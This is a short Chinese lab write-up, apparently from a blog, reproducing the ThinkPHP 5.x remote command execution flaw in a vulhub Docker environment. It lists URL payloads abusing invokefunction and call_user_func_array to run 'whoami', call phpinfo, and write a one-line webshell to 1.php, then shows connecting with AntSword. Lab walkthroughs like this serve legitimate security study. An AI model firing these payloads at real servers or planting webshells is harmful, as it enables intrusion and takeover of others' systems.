Thinkphp5x远程命令执行 靶场攻略

你不要在理我了2024-09-27 17:51

环境配置

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://172.16.1.198:8080/

2.远程命令执⾏

POC:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=whoami ![](https://i-blog.csdnimg.cn/direct/16753b4fd3bb4544bdb52b2109a6e6f3.png) #### 3.远程代码执行 POC: ?s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 ![](https://i-blog.csdnimg.cn/direct/6a91a4e3c31e4e63a88d3ab5d65d24cf.png) #### 4.写入一句话木马到根目录下的1.php POC: ?s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1\]\[\]=echo "\" \> 1.php ![](https://i-blog.csdnimg.cn/direct/732b49aa73e14b64bf6827488e1fe6d8.png) #### 5.蚁剑连接 ![](https://i-blog.csdnimg.cn/direct/400f12233e0e401290c55af68f48328a.png)

相关推荐
曹轲恒4 小时前
Java中断
java·开发语言
xxxmine4 小时前
Java并发wait(timeout)
java
冰冰菜的扣jio4 小时前
Redis缓存问题——一致性问题、事务、持久化
java·spring·mybatis
施棠海4 小时前
监听与回调的三个demo
java·开发语言
赴前尘5 小时前
golang 查看指定版本库所依赖库的版本
开发语言·后端·golang
毕设源码-钟学长5 小时前
【开题答辩全过程】以 家政服务平台为例,包含答辩的问题和答案
java
sheji34167 小时前
【开题答辩全过程】以 家庭教育资源网为例,包含答辩的问题和答案
java
百***78757 小时前
Grok-4.1与GPT-5.2深度对比:技术差异、适用场景及Python集成指南
java·python·gpt
Mr -老鬼8 小时前
Java VS Rust
java·开发语言·rust
热门推荐
01GitHub 镜像站点02Linux下V2Ray安装配置指南032025年大语言模型技术全景报告04Claude Code Skills 实用使用手册05Labelme从安装到标注:零基础完整指南06安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)07UV安装并设置国内源08AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南09网站改了域名,如何查找?10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)